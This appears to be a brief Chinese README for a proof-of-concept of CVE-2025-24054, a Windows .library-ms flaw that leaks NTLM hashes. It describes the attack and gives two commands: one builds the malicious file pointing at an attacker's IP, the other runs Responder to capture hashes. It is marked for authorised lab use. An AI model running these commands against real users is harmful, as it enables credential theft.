一个简单的 CVE-2025-24054 概念验证 – Windows 库 (.library-ms) NTLM 哈希泄露漏洞。
⚠️ 仅限教育和授权实验室使用
CVE-2025-24054 允许攻击者通过使用特制的 .library-ms 文件,强制 Windows 系统泄露受害者的 Net-NTLMv2 哈希。
当受害者解压包含恶意 .library-ms 文件的 ZIP 时,Windows 资源管理器会自动发起 SMB 连接,泄露 NTLM 哈希。
.library-ms 文件。
python poc.py -i YOUR-IP
sudo responder -I eth0